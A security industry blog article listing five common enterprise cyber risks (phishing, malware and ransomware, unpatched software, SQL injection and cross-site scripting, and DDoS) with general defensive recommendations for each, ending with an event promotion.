As an enterprise security practitioner, the number of vulnerabilities and threats you have to tackle on a daily basis can be overwhelming. As the adage goes, it only takes one, small hole for an adversary to crawl through, yet defenders must protect the entirety of the enterprise. To help you narrow your focus—since (realistically) protecting 100% of everything 100% of the time is impossible—we’ve highlighted top five most likely cyber risks to organizations today.
It should come as no surprise to anyone that phishing is a top cyber risk. Tricking people into giving up secret information is a fraudulent act as old as time. In the cyber realm, convincing people to click on an infected link, open a malicious attachment, or give up network credentials is a simple matter of crafting a message or website that replicates a legitimate source. Minute details—like a slightly altered “sender” or web address—are easy to miss. And, of course, attackers prey on human trust and curiosity by sending urgent (e.g., “Immediate action required! Your account will be closed!”) and provocative (e.g., “Your FedEx shipment has been delayed”) messages.
The best way to combat phishing is a combined human and technological approach. First off, security teams should teach employees what to look for, then train users how to spot phishing attempts and other potentially fraudulent activities. Users should be encouraged to report suspected adversarial activity—not punished if they fall victim.
At the same time, organizations should:
- Implement two-factor authentication (or multi-factor for privileged accounts) so that credentials pilfered through phishing can’t be used to escalate attacks.
- Disallow password reuse across company systems.
- Invest in basic security technologies including email and web protection, antivirus, IDS/IPS, firewalls, network segmentation, etc.
Phishing is often the primary vector to initiate the spread of malware or ransomware, but adversaries can use other methods, like taking advantage of unpatched software, piggybacking on insecure internal network communications, or setting up drive-by-downloads to launch these attacks.
Today’s malware is stealthy (except in the case of ransomware, where the objective is to make the victim aware of the attack and demand payment in exchange for the “safe return” of files). In most cases, the farther malware can spread, the more damage it can affect. Malware’s intents are widespread; it can be used to destroy/damage files, steal information, spy on users, disrupt system resources, and much more. Removing malware and recovering from a ransomware attack can be tricky, therefore the best measures to protect against malware/ransomware are preventative:
- Keep software and systems patched and up-to-date, and ensure patches used are issued by reputable vendors.
- Remove unnecessary or outdated software (e.g., SMB v.1) that is no longer supported and cannot be updated.
- Implement, monitor, and regularly test ubiquitous security technologies like firewalls, IDS, anti-malware/anti-spyware, web filtering, etc.
- Disable auto-run and auto-play from third-party websites.
- Train employees to be on the lookout for social engineering.
- Encrypt then back up (and test!) sensitive files to an air-gapped location.
Unpatched software is an easy entry point for attackers. The security industry even has a database of the most common vulnerabilities—including those in well-known and widely used software and systems—that’s published online and free to use! Naturally, attackers are perusing the Common Vulnerabilities and Exposures (CVE) database and scanning for exploit opportunities. With the knowledge of vulnerabilities in hand, threat actors don’t need to manually probe systems—they can use the same vulnerability scanners defenders use to find weaknesses in their organizations—to automate and identify systems and software open to attack.
While the tools and techniques for finding system vulnerabilities are frequently the same for attackers and defenders alike, attackers, quite simply, are quicker at finding and exploiting vulnerabilities than security teams are at finding and patching them.
The reasons and excuses for poor patch management programs are plentiful, but often it’s a simple case of prioritization. Despite known issues with unpatched and outdated systems and software, security teams either don’t or can’t (because of organizational resistance, meaning the security team has not effectively communicated the necessity of patching) prioritize patching.
When it comes to these types of risks there is only one surefire solution: Patch. Do it regularly and in a timely fashion.
SQL Injection/Cross-Site Scripting
Year-upon-year, OWASP continues to list injection attacks and cross-site scripting among its most prevalent application security risks. With applications quickly becoming a top business tool, organizations must be more diligent about shoring up application risks
SQL is a programming language commonly used to facilitate communication between the backend database and a website’s servers. A SQL injection attack is an attack technique in which malicious code is added to the user input, permitting an attacker to change the programming code and expose the database. These attacks are especially problematic if the server on which the database resides stores sensitive information, such as customer personally identifiable information or login credentials.
Cross-site scripting (XSS) is similar to SQL injection in that it injects a line of malicious code to tamper with an application, but in this case, the attacker is targeting the user’s browser to redirect the user to an infected website, hijack the user’s session, and/or steal user data.
The best ways to protect against SQL injection and XSS are to:
- Use parameterized queries so that attackers cannot slip SQL commands into queries.
- Validate/Sanitize user input.
- Avoid the use of dynamic SQL.
- Do not store database data in plaintext. If an attacker accesses the database, encryption prevents them from seeing what data you have.
- Implement a web application firewall.
Distributed Denial of Service
In late February, the largest distributed denial-of-service (DDoS) attack on record—clocking in at a whopping 1.35 terabits per second—was aimed at GitHub. Then a scant few days later, a new DDoS attack came along at 1.7 tbps and said, “hold my beer.” The latter was aimed at an unspecified U.S.-based internet service provider, who, like GitHub just days before, was able to effectively stave off the flood that leveraged Memcached servers to ratchet up traffic directed towards their site.
The intent of a DDoS attack is to cause availability issues by overwhelming a website with an excessive amount of junk traffic, prohibiting the site from operating (properly or at all), and preventing users from accessing the website, applications, or resources normally offered. Unlike other attack types on this list, a DDoS attack is meant simply to cause disruption and possibly cost the victim regular business and damage its reputation.
There are several DDoS attack types: flooding or volumetric, amplification, resource depletion, and “ping of death.” Regardless of type inflicted, the techniques, volumes, and frequency of DDoS attacks appear to be constantly increasing, making this a top risk to organizations today.
To sustain a DDoS attack, companies should:
- Consider employing a DDoS mitigation service such as Akamai, Arbor Networks, or CloudFlare (if this threat against your organization is deemed high).
- Talk to your ISP about their DDoS detection capabilities.
- Carefully monitor network traffic and alert on abnormalities.
- Understand and baseline network and application behavior, and alert on anomalies.
- Implement perimeter protections including packet filtering and setting lower thresholds.
- Institute (then test) a backup continuity plan.
Learn how to effectively identify and defend against threats to your organization at MISTI's Threat Intelligence Summit, Monday, July, 23, 2018 in San Diego.